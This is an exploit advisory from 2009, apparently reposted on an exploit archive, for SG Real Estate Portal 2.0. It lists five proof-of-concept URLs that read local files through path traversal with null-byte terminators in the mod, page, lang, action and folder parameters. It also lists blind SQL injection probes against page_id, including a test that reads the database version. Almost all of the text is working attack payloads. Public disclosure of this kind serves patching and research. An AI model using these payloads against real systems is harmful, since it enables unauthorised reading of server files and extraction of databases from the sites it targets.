SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion Vulns

2009.02.02
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22

################################################################################################################# [+] SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke ################################################################################################################# script: http://serverfree.org/download.php?file=347076 [+] Local File Inclusion - Note : For PoC's 4,5 you need administrative permissions. Don't forget to put / before the local file in poc 2,3 . ----------------------------------------------------------------------------------------------------------------- Example 1 : http://[target]/[path]/index.php?mod=[Local File]%00 PoC 1 : http://127.0.0.1/path/index.php?mod=../../../../autoexec.bat%00 ----------------------------------------------------------------------------------------------------------------- Example 2 : http://[target]/[path]/index.php?page=/[Local File]%00 PoC 2 : http://127.0.0.1/path/index.php?page=/../../../../autoexec.bat%00 ----------------------------------------------------------------------------------------------------------------- Example 3 : http://[target]/[path]/index.php?lang=/[Local File]%00&page_id=106 PoC 3 : http://127.0.0.1/path/index.php?lang=/../../../../autoexec.bat%00&page_id=106 ----------------------------------------------------------------------------------------------------------------- Example 4 : http://[target]/[path]/admin/index.php?category=security&action=[Local File]%00 PoC 4 : http://127.0.0.1/path/admin/index.php?category=security&action=../../../../../autoexec.bat%00 ----------------------------------------------------------------------------------------------------------------- Example 5 : http://[target]/[path]/admin/index.php?category=security&folder=[Local File]%00&page=params&id=8 PoC 5 : http://127.0.0.1/path/admin/index.php?category=security&folder=../../../../../autoexec.bat%00&page=params&id=8 ----------------------------------------------------------------------------------------------------------------- [+] Blind SQL Injection Example : http://127.0.0.1/path/index.php?lang=EN&page_id=106 and 1=1 http://127.0.0.1/path/index.php?lang=EN&page_id=106 and 1=2 ----------------------------------------------------------------------------------------------------------------- PoC : http://127.0.0.1/path/index.php?lang=EN&page_id=106 and substring(@@version,1,1)=5 http://127.0.0.1/path/index.php?lang=EN&page_id=106 and substring(@@version,1,1)=4 ----------------------------------------------------------------------------------------------------------------- #################################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top